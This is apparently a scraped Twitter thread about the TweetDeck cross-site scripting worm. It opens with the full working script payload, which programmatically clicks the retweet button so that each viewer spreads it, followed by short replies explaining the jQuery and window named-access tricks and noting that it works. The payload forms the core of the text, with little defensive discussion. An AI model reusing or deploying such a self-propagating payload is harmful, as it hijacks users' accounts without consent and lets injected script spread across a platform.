<script class="xss">$('.xss').parents().eq(1).find('a').eq(1).click();$('[data-action=retweet]').click();alert('XSS in Tweetdeck')</script>
-
-
-
- 2 more replies
New conversation -
-
-
-
It does work. `id=π` creates `window.π` (https://html.spec.whatwg.org/multipage/window-object.html#named-access-on-the-window-object …) which can be accessed as `π`.
- 3 more replies
New conversation -
-
-
@mathias Haha. -
@phuunet Would make for a cool interview question, no? ;) - 1 more reply
New conversation -
-
-
@mathias Isn't .parents().eq(0) the same as .parent()?@derGeruhn -
@subzey Yeah but it’s .parents().eq(1) in this case. +@derGeruhn - 1 more reply
New conversation -
-
-
@mathias@dergeruhn awesome to watch my colleagues reaction each time I retweet one of these…Thanks. Twitter will use this to make your timeline better. UndoUndo
-
-
-
@mathias@derGeruhn as I don't remember having seen that a number of retweets yet, I must assume it actually works...Thanks. Twitter will use this to make your timeline better. UndoUndo
-
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.